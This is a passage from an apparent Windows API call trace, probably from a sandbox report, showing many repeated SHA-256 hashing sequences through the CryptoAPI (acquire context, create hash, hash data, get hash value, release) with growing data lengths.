pbData=0x320b50, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320b50, pdwDataLen=0x12e8b8) returned 1 [0230.903] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.903] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.903] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.904] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.904] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0230.904] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.904] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320b80, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320b80, pdwDataLen=0x12e8b8) returned 1 [0230.904] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.904] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.904] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.904] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.904] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0230.904] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.904] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320bb0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320bb0, pdwDataLen=0x12e8b8) returned 1 [0230.904] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.904] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.904] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.905] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.905] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0230.905] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.905] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320be0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320be0, pdwDataLen=0x12e8b8) returned 1 [0230.905] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.905] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.905] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.920] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.920] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0230.920] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.920] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320490, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320490, pdwDataLen=0x12e8b8) returned 1 [0230.920] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.920] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.920] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.921] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.921] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0230.921] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.921] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320c60, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320c60, pdwDataLen=0x12e8b8) returned 1 [0230.921] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.921] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.921] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.921] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.921] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x20, dwFlags=0x0) returned 1 [0230.921] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.921] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320cc0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320cc0, pdwDataLen=0x12e8b8) returned 1 [0230.921] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.921] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.921] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.922] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.922] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x40, dwFlags=0x0) returned 1 [0230.922] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.922] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320cf0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320cf0, pdwDataLen=0x12e8b8) returned 1 [0230.922] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.922] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.922] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.922] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.922] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x60, dwFlags=0x0) returned 1 [0230.922] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.922] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320d20, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320d20, pdwDataLen=0x12e8b8) returned 1 [0230.922] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.922] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.922] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.923] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.923] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x80, dwFlags=0x0) returned 1 [0230.923] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.923] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320d50, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320d50, pdwDataLen=0x12e8b8) returned 1 [0230.923] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.923] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.923] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.923] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.923] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0230.923] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.923] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320d80, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320d80, pdwDataLen=0x12e8b8) returned 1 [0230.923] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.923] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.923] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.924] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.924] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0230.924] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.924] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320db0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320db0, pdwDataLen=0x12e8b8) returned 1 [0230.924] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.924] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.924] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.924] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.924] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0230.924] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.924] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320de0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320de0, pdwDataLen=0x12e8b8) returned 1 [0230.924] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.924] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.924] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.925] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.925] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x100, dwFlags=0x0) returned 1 [0230.925] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.925] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320e10, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320e10, pdwDataLen=0x12e8b8) returned 1 [0230.925] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.925] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.925] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.925] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.925] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x120, dwFlags=0x0) returned 1 [0230.925] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.925] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320e40, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320e40, pdwDataLen=0x12e8b8) returned 1 [0230.926] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.926] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.926] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.926] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.926] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x140, dwFlags=0x0) returned 1 [0230.926] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.926] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320e70, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320e70, pdwDataLen=0x12e8b8) returned 1 [0230.926] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.926] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.926] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.927] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.927] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x160, dwFlags=0x0) returned 1 [0230.927] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.927] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320ea0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320ea0, pdwDataLen=0x12e8b8) returned 1 [0230.927] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.927] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.927] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.927] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.927] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x180, dwFlags=0x0) returned 1 [0230.927] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.927] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320ed0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320ed0, pdwDataLen=0x12e8b8) returned 1 [0230.927] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.927] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.927] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.928] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.928] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0230.928] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.928] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320f00, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320f00, pdwDataLen=0x12e8b8) returned 1 [0230.928] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.928] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.928] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.928] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.928] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0230.928] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.928] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320f30, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320f30, pdwDataLen=0x12e8b8) returned 1 [0230.928] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.928] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.928] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.929] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.929] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0230.929] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.929] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320f60, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320f60, pdwDataLen=0x12e8b8) returned 1 [0230.929] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.929] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.929] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.929] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.929] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x200, dwFlags=0x0) returned 1 [0230.929] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.929] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320f90, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320f90, pdwDataLen=0x12e8b8) returned 1 [0230.929] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.929] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.929] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.930] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.930] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x220, dwFlags=0x0) returned 1 [0230.930] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.930] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320fc0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320fc0, pdwDataLen=0x12e8b8) returned 1 [0230.930] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.930] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.930] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.930] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.930] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x240, dwFlags=0x0) returned 1 [0230.930] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.930] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320ff0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320ff0, pdwDataLen=0x12e8b8) returned 1 [0230.930] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.930] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.930] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.931] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.931] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x260, dwFlags=0x0) returned 1 [0230.931] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.931] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321020, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321020, pdwDataLen=0x12e8b8) returned 1 [0230.931] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.931] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.931] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.931] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.931] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x280, dwFlags=0x0) returned 1 [0230.931] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.931] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321050, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321050, pdwDataLen=0x12e8b8) returned 1 [0230.931] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.931] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.931] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.932] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.932] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0230.932] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.932] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321080, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321080, pdwDataLen=0x12e8b8) returned 1 [0230.932] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.932] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.932] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.932] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.932] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0230.932] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.932] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3210b0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3210b0, pdwDataLen=0x12e8b8) returned 1 [0230.932] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.932] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.932] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.933] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.933] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0230.933] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.933] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3210e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3210e0, pdwDataLen=0x12e8b8) returned 1 [0230.933] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.933] CryptReleaseContext 